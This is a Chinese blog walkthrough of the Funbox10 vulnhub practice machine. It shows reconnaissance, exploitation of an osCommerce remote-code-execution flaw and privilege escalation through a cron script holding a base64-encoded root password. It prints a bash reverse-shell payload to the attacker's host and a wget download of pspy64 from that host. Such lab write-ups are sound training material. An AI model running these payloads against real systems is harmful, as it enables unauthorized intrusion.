funbox10靶机(命令执行漏洞)

最新推荐文章于 2024-06-14 20:00:00 发布
最新推荐文章于 2024-06-14 20:00:00 发布
阅读量624 收藏
点赞数
分类专栏: Box系列 文章标签: centos linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66299232/article/details/127966371
版权

环境准备

靶机链接:百度网盘 请输入提取码

提取码:v4in

虚拟机网络链接模式:桥接模式

攻击机系统:kali linux 2021.1

信息收集

1.探测目标靶机 arp-scan -l

2.探测目标靶机开放端口和服务情况

nmap -p- -A -T4 192.168.1.100

3.用gobuster对80端口进行目录探测

gobuster dir -u http://192.168.1.100 \ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak

漏洞利用

1.查看页面

 

2.对扫出的catalog目录进行访问,并且发现其版本号

3.用kali自动工具进行漏洞探测 searchsploit oscommerce

4.我们用远程代码执行漏洞的44374.py ,并且查看内容

5.把base_url改为靶机地址,进行访问,网页给出的是一个ls 命令的结果(29行)

6.这次我们把29行改为 ls -l /bin ,再次访问

7.这次把命令换为一个可以反弹shell的命令,观察这是php网页,所以执行命令也是用php支持执行的(谷歌php执行命令函数),我们用shell-exec , bash -c 是执行的意思

"shell-exec('bash -c \"bash -i >& /dev/tcp/192.168.1.106/4444 0>&1\"');"

8.访问页面,shell回弹成功

权限提升

1.没有可利用的信息和文件,我选择上传本地脚本进行探测(github里有pspy64)

wget http://192.168.1.106:8000/pspy64

2.检测出一个自动任务的脚本(大概5.6分钟才能看到)

3.查看下内容发现有一段base64加密的信息

4.经过解密后 ,发现密码 //-d参数是解密

echo 'LXUgcm9vdCAtcCByZnZiZ3QhIQ==' | base64 -d

-u root -p rfvbgt!!

5.尝试登录root用户,成功登录,顺利拿下!!!

魏钦6666
关注
专栏目录
vulnhub靶机Funbox10
timesleep的博客
04-07 490
vulnhub靶机Funbox10 首先我们使用kali扫描地址 然后我们对靶机地址进行端口扫描 然后我们访问80端口看下 然后我们使用dirb扫描网站目录、然后我们访问这四个目录看下 只有catalog可以访问,那我们重点就看下这里,根据版本,我们找找到了他有命令执行,参考链接https://bbs.ichunqiu.com/thread-37191-1-1.html 确认并可以访问打开hackbar 执行payload,访问页面 GET:http://127.0.0.1/catal
Funbox10靶机详解
weixin_44681307的博客
07-21 283
执行后发现拿到一个shell,但是这个shell权限很低,命令都不能用,就像做一个反弹shell。我wget能下载文件的原因是我在kali上开启了apache2服务,常用文件放一起就好了。我们进去这个目录看看,cat一下发现点线索,一看这就是一个base64编码的。最难的就是反弹shell,学会了一些新的反弹shell命令。文件,里面有一个jack用户的账号密码,su一下就登陆上了。进去后发现有点像一个CMS,就去搜索了一下有没有漏洞。这个靶机扫描ip并没有什么有用的东西,就不展示了。
FUNBOX-5靶机
小小猪的博客
06-30 363
FUNBOX-5靶机 arp-scan -l 扫描靶机IP地址 nmap -sV -Pn -A x.x.x.134 扫描靶机端口 访问80端口是默认的apache页面,扫描目录发现robots.txt文件,发现一个,但是试了发现没有,想到下载页面的提示,这里就没有深究 并不是目录 再次看扫描的目录 在之前的目录下拼上index.php发现是可以访问的,还有wp-content目录也是可以访问的,那么接下来就直接上神器wpscan扫描用户,至于wpscan的用法我前面有一篇
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox1
Aluxian_的博客
09-05 2477
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。老样子需要找到flag即可。1.修改/etc/hosts文件 解析网站2.从新学习了一遍定时提权 (主要是回弹的命令)3.还有一些简单的扫码工具 和枚举工具 这靶机其实很简单 因为太久没做了 所以从新温习一下 主要是学习渗透的思路!
靶机实战:Funbox10
最新发布
CHAsichuan的博客
06-14 2220
一次中等难度的靶机超详细版记录
ifunbox setup v4.4 资源管理神器
04-11
《ifunbox setup v4.4:iOS设备资源管理利器详解》 在移动设备的世界里,尤其是对于苹果的iPhone和iOS设备用户来说,管理和编辑设备上的文件并不像在电脑上那样直观简便。这时,一款强大的资源管理工具就显得尤为...
iFunBox ifunbox-v2.6.2375
10-21
iFunBox是一款针对苹果设备(包括iPhone、iPod Touch和iPad)的专业文件管理工具,它允许用户在无需越狱或安装额外守护进程的情况下,轻松访问和管理设备中的文件系统。这款软件提供了简单易用的界面,使得用户可以...
ifunbox_setup_4.2.exe
02-22
ifunbox_setup_4.2.exe
iFunBox下载 iFunbox v4.0 Build 4106.1352 Preview
10-16
iFunBox是一款小巧的iPhone文件管理软件。iFunBox中文版界面类似于windows资源管理器,以简练时尚的窗口方式浏览和管理iPhone、iPad、iPod touch上的文件和目录。iFunBox既可以在手机与电脑之间
iFunBox for iOS
06-02
iFunBox是一个iOS系统的文件浏览器,安装在Mac端,浏览iOS系统全面貌,就像Finder一样,iOS需要越狱,官方下载地址http://www.i-funbox.com/en_download.html
Funbox 3靶机wp
m0_52496313的博客
09-09 517
Funbox 3靶机wp
Funbox 10 靶机wp
m0_52496313的博客
08-21 286
Funbox 10 靶机wp
FUNBOX_SCRIPTKIDDIE靶机详解
weixin_44681307的博客
07-25 320
这个靶场给了太多的干扰因素,当你打完后反过来再看是非常简单的一个靶场,但是你打的过程中却会觉得非常难,干扰因素实在天多了。对IP进行一个单独扫描后发现开了一个ProFTPD 1.3.3c的FTP,直接对这个搜索了一下。里面给出就两天命令就可以拿到root权限了,输入后直接root,很简单。题目中给了说加一条hosts,实际没用上。发现有两个可以利用的,我选择的是第二个。
记一次Funbox10靶机的渗透测试
qq_55415442的博客
06-14 184
Funbox10靶机渗透测试
靶机Funbox: Scriptkiddie
weixin_50339323的博客
09-14 441
一、信息收集 1. 获取靶机IP (在扫描靶机IP过程中扫不到IP,更改下靶机的配置文件) 2. 扫描端口 nmap -sC -sV 192.168.8.144 3. 进入web页面 4. 扫目录 发现网站是wordpress搭建的 二、漏洞利用&提权 1. 用wpscan扫描 1)枚举用户名 wpscan --url http://192.168.8.144/ --enunerate u 用户名有admin 2)爆破密码 wpscan ...
Vulnhub靶机FunBox 5
qq_48904485的博客
01-24 1074
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机FunBox 5(10.0.2.30)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/funbox-next-level,547/
Vulnhub-Funbox: Rookie(Funbox2)靶机渗透
m0_68117643的博客
07-07 1226
关于Funbox2这台靶机,运行在Vmware中无法获取靶机IP,尝试桥接、NAT、仅主机三种模式均无果,无奈转用VirtualBox,但NAT和桥接模式下也获取不到IP,仅在host-only模式下才可获取到靶机IP
vulnhub靶机实战--FunBox:1
m0_64312309的博客
09-21 540
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox11(Scriptkiddie)
Aluxian_的博客
09-21 1103
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。老样子需要找到flag即可。FunBox系列第十一个靶机了 也是最后一个比较简单1.信息收集 获取ip地址 和端口信息2.metasploit的基本操作3. 了解后门命令执行漏洞这是这个系列第十一个靶机啦 比较简单 希望对刚入门得小白有帮助!至此这个系列更新完啦!🙂。
使用ifunbox与itunes轻松管理iPhone应用
"本文主要介绍了如何使用iFunbox和iTunes来解决iPhone的程序安装问题,包括安装DEB程序、传输图片、删除应用程序以及传送电子书、视频和手机铃声的步骤。" 在iOS设备的管理中,iFunbox和iTunes是两个常用的工具,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值